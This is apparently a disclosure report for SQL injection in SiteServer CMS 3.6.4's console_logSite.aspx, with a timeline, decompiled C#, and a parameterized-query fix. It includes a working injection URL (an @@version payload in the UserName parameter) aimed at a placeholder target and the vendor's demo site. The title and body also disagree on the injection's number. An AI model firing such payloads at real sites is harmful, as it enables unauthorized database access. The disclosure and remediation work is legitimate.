2013-11-26: Details sent to the vendor, awaiting vendor handling
2013-11-27: Vendor confirmed; details disclosed to the vendor only
2013-11-30: Details opened to third-party security partners
2014-01-21: Details disclosed to core white hats and relevant domain experts
2014-01-31: Details disclosed to regular white hats
2014-02-10: Details disclosed to intern white hats
2014-02-24: Details disclosed to the public
SiteServer latest version 3.6.4 has SQL injection (injection #12)

The 11th injection is in /siteserver/cms/console_logSite.aspx. Decompiling SiteServer.CMS.dll with .NET Reflector shows the following code:
public void Page_Load(object sender, EventArgs E)
{
    int num;
    Exception exception;
    bool isPostBack;
    int publishmentSystemID;
    this.spContents.ControlToPaginate = this.rptContents;
    if ((((uint) num) + ((uint) num)) >= 0)
    {
        this.spContents.ItemsPerPage = 0x19;
        this.spContents.ConnectionString = BaiRongDataProvider.ConnectionString;
        isPostBack = base.Request.QueryString["UserName"] != null;
        if (!isPostBack)
        {
            this.spContents.SelectCommand = DataProvider.LogDAO.GetSelectCommend();
        }
        else
        {
            this.spContents.SelectCommand = DataProvider.LogDAO.GetSelectCommend(
                base.PublishmentSystemID,
                base.Request.QueryString["LogType"],
                base.Request.QueryString["UserName"],
                base.Request.QueryString["Keyword"],
                base.Request.QueryString["DateFrom"],
                base.Request.QueryString["DateTo"]);
        }
        this.spContents.SortField = "ID";
        this.spContents.SortMode = SortMode.DESC;
        goto Label_068A;
    }
The parameters above are passed into the following method:
public string GetSelectCommend(int publishmentSystemID, string logType, string userName, string keyword, string dateFrom, string dateTo)
{
    // This item is obfuscated and can not be translated.
    StringBuilder builder;
    bool flag;
    bool flag2;
    if (publishmentSystemID != 0)
    {
        goto Label_0475;
    }
    while (!string.IsNullOrEmpty(logType))
    {
        if (!StringUtils.EqualsIgnoreCase(logType, "All"))
        {
            goto Label_0475;
        }
        if (3 == 0)
        {
            goto Label_0016;
        }
        if (((uint) publishmentSystemID) >= 0)
        {
            break;
        }
    }
    if (!string.IsNullOrEmpty(userName) || !string.IsNullOrEmpty(keyword))
    {
        goto Label_0475;
    }
    goto Label_046C;
Label_0010:
    if (!flag2)
    {
        goto Label_013D;
    }
Label_0016:
    return ("SELECT ID, PublishmentSystemID, ChannelID, ContentID, UserName, IPAddress, AddDate, Action, Summary FROM siteserver_Log " + builder.ToString());
    ......
Label_02C8:
    flag = true;
    builder.AppendFormat("(UserName = '{0}')", userName);
Label_02DD:
    flag2 = string.IsNullOrEmpty(keyword);
    goto Label_029C;
}
Each of these Request.QueryString["xxx"] values is an injection point: they are formatted straight into the WHERE clause (for example builder.AppendFormat("(UserName = '{0}')", userName)) with no escaping or parameterization.
http://www.target.com/siteserver/cms/console_logSite.aspx?UserName='%20and%201=@@version%20and%201='1&Keyword=&DateFrom=&DateTo=&PublishmentSystemID=0&LogType=All
Official site:
http://2012.moban.siteserver.cn/siteserver/cms/console_logSite.aspx?UserName='%20and%201=@@version%20and%201='1&Keyword=&DateFrom=&DateTo=&PublishmentSystemID=0&LogType=All
Fix suggestion: filter those parameters.
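The durable fix for the concatenation in GetSelectCommend is to bind every request value as a SqlParameter rather than filtering characters out of it. The following is an added example written for this report, not SiteServer's code: it rebuilds the same log query using the standard System.Data.SqlClient API. The table and column names come from the decompiled SELECT above; the mapping of Keyword to Summary, DateFrom/DateTo to AddDate and LogType to Action is an assumption, as are the column lengths.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Text;

// Added example, not SiteServer's code: builds the log query with SqlParameters
// instead of splicing request strings into the SQL text. Column mapping for
// Keyword/DateFrom/DateTo/LogType and the NVarChar sizes are assumptions.
public static class LogQueryBuilder
{
    public static SqlCommand Build(SqlConnection conn, int publishmentSystemID,
        string logType, string userName, string keyword, string dateFrom, string dateTo)
    {
        var sql = new StringBuilder(
            "SELECT ID, PublishmentSystemID, ChannelID, ContentID, UserName, IPAddress, " +
            "AddDate, Action, Summary FROM siteserver_Log WHERE 1 = 1");
        var cmd = new SqlCommand { Connection = conn, CommandType = CommandType.Text };

        if (publishmentSystemID != 0)
        {
            sql.Append(" AND PublishmentSystemID = @PublishmentSystemID");
            cmd.Parameters.Add("@PublishmentSystemID", SqlDbType.Int).Value = publishmentSystemID;
        }

        // "All" (case-insensitive) means no filter, mirroring the original EqualsIgnoreCase check.
        if (!string.IsNullOrEmpty(logType) &&
            !string.Equals(logType, "All", StringComparison.OrdinalIgnoreCase))
        {
            sql.Append(" AND Action = @LogType");
            cmd.Parameters.Add("@LogType", SqlDbType.NVarChar, 50).Value = logType;
        }

        if (!string.IsNullOrEmpty(userName))
        {
            // Bound as data: a quote inside the value can no longer close the literal.
            sql.Append(" AND UserName = @UserName");
            cmd.Parameters.Add("@UserName", SqlDbType.NVarChar, 255).Value = userName;
        }

        if (!string.IsNullOrEmpty(keyword))
        {
            // LIKE needs its own escaping: binding alone does not neutralise % _ [ wildcards.
            sql.Append(" AND Summary LIKE @Keyword ESCAPE '\\'");
            cmd.Parameters.Add("@Keyword", SqlDbType.NVarChar, 255).Value =
                "%" + EscapeLike(keyword) + "%";
        }

        // Dates are parsed before binding; anything that is not a date is rejected
        // instead of being passed through as text.
        DateTime fromDate, toDate;
        if (!string.IsNullOrEmpty(dateFrom))
        {
            if (!DateTime.TryParse(dateFrom, out fromDate))
                throw new ArgumentException("DateFrom is not a valid date", nameof(dateFrom));
            sql.Append(" AND AddDate >= @DateFrom");
            cmd.Parameters.Add("@DateFrom", SqlDbType.DateTime).Value = fromDate;
        }
        if (!string.IsNullOrEmpty(dateTo))
        {
            if (!DateTime.TryParse(dateTo, out toDate))
                throw new ArgumentException("DateTo is not a valid date", nameof(dateTo));
            sql.Append(" AND AddDate <= @DateTo");
            cmd.Parameters.Add("@DateTo", SqlDbType.DateTime).Value = toDate;
        }

        // Same ordering the page sets through SortField = "ID", SortMode = DESC.
        sql.Append(" ORDER BY ID DESC");
        cmd.CommandText = sql.ToString();
        return cmd;
    }

    // Escapes SQL Server LIKE metacharacters so the keyword is matched literally.
    private static string EscapeLike(string value)
    {
        return value.Replace("\\", "\\\\").Replace("%", "\\%").Replace("_", "\\_").Replace("[", "\\[");
    }
}
```

One caveat when applying this to the page: Page_Load hands a plain SQL string to spContents.SelectCommand, so the paging control executes raw text. Unless that control exposes a parameter collection, the query has to be run through the SqlCommand returned here (cmd.ExecuteReader()) and its rows handed to the repeater; a character blacklist on the query-string values would leave the concatenation in place and is easy to get wrong.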
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2013-11-27 09:31
Thanks to Xiaoxin for the work; the product will be fixed as soon as possible.
None yet.